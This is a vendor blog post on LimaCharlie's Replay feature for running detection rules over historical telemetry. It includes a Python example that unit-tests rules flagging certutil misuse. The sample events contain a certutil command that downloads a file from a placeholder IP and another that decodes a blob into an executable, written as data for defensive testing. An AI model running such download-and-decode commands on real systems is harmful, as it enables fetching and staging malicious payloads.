Running detection & response rules against historical telemetry

Christopher Luft

Replay is the ability to run detection logic over historical data. Recently the team at LimaCharlie made some modifications to the user interface that make this feature set more accessible.

This capability provides some unique advantages for cybersecurity operations.

  1. Allows for a continuous integration / continuous development (CI/CD) approach. When rules are modified through your change control process, you can confirm that there are no unexpected results by running them against known data. Think unit tests for detection logic. This moves us closer to the concept of ‘Detectors as Code’.

  2. If a new zero-day becomes known, you can run a test for its known indicators of compromise over the last year of endpoint telemetry.
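The "unit tests for detection logic" idea from point 1, as an added example that is not LimaCharlie's code or its rule format: a hypothetical, simplified rule evaluator (the `op`/`path`/`value` layout and the event shape are assumptions) is replayed over a few constructed historical events, and a check compares the hits with the expected answer so a rule edit that widens or narrows scope is caught before it ships.

```python
# Constructed sample telemetry: simplified endpoint events, not real product output.
HISTORICAL_EVENTS = [
    {"id": 1, "routing": {"event_type": "NEW_PROCESS"},
     "event": {"FILE_PATH": "C:\\Windows\\System32\\certutil.exe",
               "COMMAND_LINE": "certutil -urlcache -split -f http://198.51.100.7/a.txt a.txt"}},
    {"id": 2, "routing": {"event_type": "NEW_PROCESS"},
     "event": {"FILE_PATH": "C:\\Windows\\System32\\certutil.exe",
               "COMMAND_LINE": "certutil -hashfile setup.msi SHA256"}},
    {"id": 3, "routing": {"event_type": "DNS_REQUEST"},
     "event": {"DOMAIN_NAME": "updates.example.net"}},
    {"id": 4, "routing": {"event_type": "NEW_PROCESS"},
     "event": {"FILE_PATH": "C:\\Users\\alice\\Downloads\\certutil.exe",
               "COMMAND_LINE": "certutil -decode blob.b64 out.exe"}},
]

# Leaf comparisons of the hypothetical rule language (both sides lower-cased by evaluate()).
LEAF_OPS = {"is": lambda found, want: found == want,
            "contains": lambda found, want: want in found,
            "ends with": lambda found, want: found.endswith(want)}

def lookup(event, path):  # resolve an 'event/COMMAND_LINE'-style path; None when absent
    cur = event
    for key in path.split("/"):
        cur = cur.get(key) if isinstance(cur, dict) else None
    return cur

def evaluate(rule, event):  # 'and'/'or' nodes over string-comparison leaves
    if rule["op"] in ("and", "or"):
        results = [evaluate(r, event) for r in rule["rules"]]
        return all(results) if rule["op"] == "and" else any(results)
    found = lookup(event, rule["path"])
    return found is not None and LEAF_OPS[rule["op"]](str(found).lower(), str(rule["value"]).lower())

def replay(rule, events):  # ids of the historical events the rule would have fired on
    return [e["id"] for e in events if evaluate(rule, e)]

def check_rule(rule, events, expected_ids):  # the unit test: (passed, unexpected hits, missed hits)
    hits = set(replay(rule, events))
    unexpected, missed = sorted(hits - set(expected_ids)), sorted(set(expected_ids) - hits)
    return (not unexpected and not missed, unexpected, missed)

# Version 1 of the detector: certutil used to fetch a remote file.
RULE_V1 = {"op": "and", "rules": [
    {"op": "is", "path": "routing/event_type", "value": "NEW_PROCESS"},
    {"op": "ends with", "path": "event/FILE_PATH", "value": "certutil.exe"},
    {"op": "contains", "path": "event/COMMAND_LINE", "value": "-urlcache"}]}

# Version 2 after a change request: also flag certutil decoding a payload.
RULE_V2 = {"op": "and", "rules": RULE_V1["rules"][:2] + [{"op": "or", "rules": [
    {"op": "contains", "path": "event/COMMAND_LINE", "value": "-urlcache"},
    {"op": "contains", "path": "event/COMMAND_LINE", "value": "-decode"}]}]}
```

Replaying the old expectation `[1]` against `RULE_V2` fails with event 4 reported as an unexpected hit, which is exactly the signal a change-control pipeline needs: the reviewer then either accepts the wider scope by updating the expected set to `[1, 4]` or sends the rule back.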

With Replay you are going to have confidence that your team can move fast and not break things. Save time on your change control process and bring a proven engineering approach to your cybersecurity operations.